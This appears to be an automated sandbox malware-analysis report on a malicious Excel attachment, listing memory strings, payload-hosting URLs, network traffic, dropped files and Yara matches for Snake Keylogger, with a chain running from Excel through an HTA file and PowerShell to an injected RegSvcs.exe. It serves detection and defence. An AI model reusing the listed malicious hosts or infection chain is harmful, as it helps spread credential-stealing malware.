0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420177418.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420256019.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417961702.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471062892.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/
Source: mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/=#
Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467118716.0000000000131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8
Source: mshta.exe, 00000004.00000002.420227515.000000000024D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8$
Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8&W
Source: mshta.exe, 00000004.00000003.417457596.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.00000000030B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8H
Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8K
Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8O
Source: SYSN ORDER.xls, B8230000.0.dr String found in binary or memory: https://og1.in/cIP5a8m
Source: mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/cIP5a8pdate.hta
Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33PLZ
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Excel sheet contains many unusual embedded objects
Source: SYSN ORDER.xls OLE: Microsoft Excel 2007+
Source: B8230000.0.dr OLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta Jump to behavior
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE89A7352E 7_2_000007FE89A7352E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C5038 14_2_003C5038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C3065 14_2_003C3065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C3891 14_2_003C3891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C78C0 14_2_003C78C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C4130 14_2_003C4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C2910 14_2_003C2910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C5B18 14_2_003C5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C3B70 14_2_003C3B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C2BF0 14_2_003C2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C8448 14_2_003C8448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C35B0 14_2_003C35B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C3E51 14_2_003C3E51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003CC750 14_2_003CC750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C6741 14_2_003C6741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C7001 14_2_003C7001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C6BA0 14_2_003C6BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003C7461 14_2_003C7461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003CC742 14_2_003CC742
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003CBFC8 14_2_003CBFC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CF460 14_2_004CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CD4E0 14_2_004CD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CC480 14_2_004CC480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CE178 14_2_004CE178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C25E0 14_2_004C25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C5E58 14_2_004C5E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CEE10 14_2_004CEE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CDB30 14_2_004CDB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CE7C0 14_2_004CE7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C4448 14_2_004C4448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C9459 14_2_004C9459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C9468 14_2_004C9468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C1470 14_2_004C1470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C101A 14_2_004C101A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C1028 14_2_004C1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CC028 14_2_004CC028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C443A 14_2_004C443A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C6CC8 14_2_004C6CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C18C9 14_2_004C18C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C18D8 14_2_004C18D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CC8D8 14_2_004CC8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C98E8 14_2_004C98E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C4CE8 14_2_004C4CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C4CF8 14_2_004C4CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C1480 14_2_004C1480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C4890 14_2_004C4890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C48A0 14_2_004C48A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C9D40 14_2_004C9D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C5140 14_2_004C5140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C5150 14_2_004C5150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C2178 14_2_004C2178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C1D20 14_2_004C1D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C1D30 14_2_004C1D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C25D0 14_2_004C25D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CA5E1 14_2_004CA5E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CA5F0 14_2_004CA5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C59F0 14_2_004C59F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C2188 14_2_004C2188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CA188 14_2_004CA188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CA198 14_2_004CA198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C55A8 14_2_004C55A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C55A0 14_2_004C55A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CAA48 14_2_004CAA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C5A00 14_2_004C5A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C7A10 14_2_004C7A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C2A28 14_2_004C2A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C2A38 14_2_004C2A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CAA38 14_2_004CAA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C32D9 14_2_004C32D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C32E8 14_2_004C32E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C2E81 14_2_004C2E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C7698 14_2_004C7698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C2E90 14_2_004C2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CAE90 14_2_004CAE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CAEA0 14_2_004CAEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C3740 14_2_004C3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C0768 14_2_004C0768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CB767 14_2_004CB767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C0778 14_2_004C0778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CB778 14_2_004CB778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C030F 14_2_004C030F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C8708 14_2_004C8708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CB311 14_2_004CB311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C0320 14_2_004C0320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CB320 14_2_004CB320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C3732 14_2_004C3732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C0BC0 14_2_004C0BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CBBC1 14_2_004CBBC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C0BD0 14_2_004C0BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004CBBD0 14_2_004CBBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C3FE0 14_2_004C3FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C3FF0 14_2_004C3FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C3B88 14_2_004C3B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004C3B98 14_2_004C3B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00890690 14_2_00890690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00890CD8 14_2_00890CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00890040 14_2_00890040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00890012 14_2_00890012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D5038 23_2_002D5038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D3055 23_2_002D3055
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D3891 23_2_002D3891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D78CB 23_2_002D78CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D4130 23_2_002D4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D2910 23_2_002D2910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002DD1E8 23_2_002DD1E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D5B18 23_2_002D5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D3B70 23_2_002D3B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D2BF0 23_2_002D2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D4410 23_2_002D4410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D8448 23_2_002D8448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D35B0 23_2_002D35B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D3E51 23_2_002D3E51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D6741 23_2_002D6741
